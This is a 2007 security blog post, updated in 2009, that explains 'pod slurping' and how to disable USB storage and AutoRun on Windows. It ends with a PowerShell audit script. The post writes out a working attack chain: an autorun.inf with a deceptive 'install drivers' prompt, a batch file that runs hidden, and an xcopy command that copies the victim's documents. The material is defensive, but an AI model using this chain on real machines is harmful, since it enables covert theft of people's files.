Friday, December 21, 2007

iPod can be "malicious"...

Many of you may know about Pod Slurping. For the benefit of those who don't, Pod Slurping is the act of using a portable data storage device, such as an iPod, to illicitly download confidential data by plugging it directly into the computer where the data is held.

We are talking about an iPod or USB flash drive that automatically copies files and data as soon as it is connected to a USB port on the victim's system. It is the easiest way to "steal" information from an "innocent" victim without their knowledge.

Very often, you will see people sharing mp3 songs and document files by passing around their iPod or USB drive. A pod slurping script can easily be placed on a USB drive, and the victim tricked (with some mp3 songs) into plugging it into his/her system.

How pod slurping works
1) To perform pod slurping, a simple autorun setup file is written as below:
autorun.inf -
>[autorun]
>open=begin.bat
>action=Click "OK" to install USB flash drive drivers
>shell\open\command=begin.bat

2) As seen in the autorun file, a batch file "begin.bat" minimises and runs the actual batch file that copies all the "targeted" data.
begin.bat -
>@echo off
>@start /min slurp.bat /B
>@exit

3) Another batch file, "slurp.bat", is the one that actually copies the data onto the USB drive. It contains whatever DOS commands are needed to "steal" the victim's data, such as:
> xcopy *.doc

How to protect against pod slurping
There are a few ways to protect against Pod Slurping. You can either (1) disable USB storage devices or (2) disable USB AutoRun.
1) To disable the use of USB storage devices: if a USB storage device has not already been installed on the computer, set Deny permissions for the user or the group on the following files:
> %SystemRoot%\Inf\Usbstor.pnf
> %SystemRoot%\Inf\Usbstor.inf
If a USB storage device is already installed on the computer, set the "Start" value under the registry path "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor" to 4.

For the detailed steps, refer to Microsoft TechNet (http://support.microsoft.com/kb/823732)

2) To disable USB AutoRun, set the "NoDriveTypeAutoRun" DWORD value under the registry path "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" to 0xFF (255), which turns AutoRun off for every drive type.

For the details, refer to Microsoft MSDN (http://msdn2.microsoft.com/en-us/library/bb776825.aspx)
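The two registry mitigations above can be audited (and, optionally, applied) with a script. The following PowerShell is an added example, not part of the original post; it checks the per-user NoDriveTypeAutoRun value from step 2, the machine-wide policy key of the same name (an addition, not mentioned above), and the UsbStor Start value from step 1. The -Fix switch is an assumed convenience for applying the expected values.

```powershell
# Added audit script (not from the original post). Reads the registry only,
# unless -Fix is supplied; run in an elevated PowerShell on Windows.
param([switch]$Fix)

$checks = @(
    @{ Name     = 'AutoRun disabled (per-user policy)'
       Path     = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Value    = 'NoDriveTypeAutoRun'
       Expected = 0xFF },
    @{ Name     = 'AutoRun disabled (machine-wide policy)'
       Path     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Value    = 'NoDriveTypeAutoRun'
       Expected = 0xFF },
    @{ Name     = 'USB mass-storage driver disabled (Start = 4)'
       Path     = 'HKLM:\SYSTEM\CurrentControlSet\Services\UsbStor'
       Value    = 'Start'
       Expected = 4 }
)

$results = foreach ($c in $checks) {
    $current = $null
    if (Test-Path $c.Path) {
        # A missing value yields $null rather than an error.
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Value `
                    -ErrorAction SilentlyContinue).($c.Value)
    }
    $ok = ($null -ne $current) -and ($current -eq $c.Expected)

    if (-not $ok -and $Fix) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        New-ItemProperty -Path $c.Path -Name $c.Value -PropertyType DWord `
                         -Value $c.Expected -Force | Out-Null
        $current = $c.Expected
        $ok = $true
    }

    [pscustomobject]@{
        Check     = $c.Name
        Current   = $current
        Expected  = $c.Expected
        Compliant = $ok
    }
}

$results | Format-Table -AutoSize
```

Applying the UsbStor setting blocks all USB mass-storage devices, not just untrusted ones, so decide per machine whether that is acceptable. As the 2009 update to this post notes, a compliant NoDriveTypeAutoRun value only takes effect once Microsoft's AutoRun fix (KB967715) is installed.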

So the next time you share files from a USB storage device, make sure nothing "sensitive" is "secretly" copied out of your system.

Updated on 26 February 2009 -
US-CERT released an announcement on 20 January 2009 stating that "Microsoft Windows does not disable AutoRun properly". In the announcement, they claim that "Disabling AutoRun on Microsoft Windows systems can help prevent the spread of malicious code. However, Microsoft's guidelines for disabling AutoRun are not fully effective, which could be considered a vulnerability." Malware such as the Conficker worm uses AutoRun to spread.

On 24 February 2009, Microsoft released a support Knowledge Base article, "Article ID: 967715 - How to correct "disable Autorun registry key" enforcement in Windows", giving detailed steps for disabling AutoRun in Windows. They also released a security advisory, Update for Windows Autorun (KB967940), with a patch that corrects the AutoRun functionality.
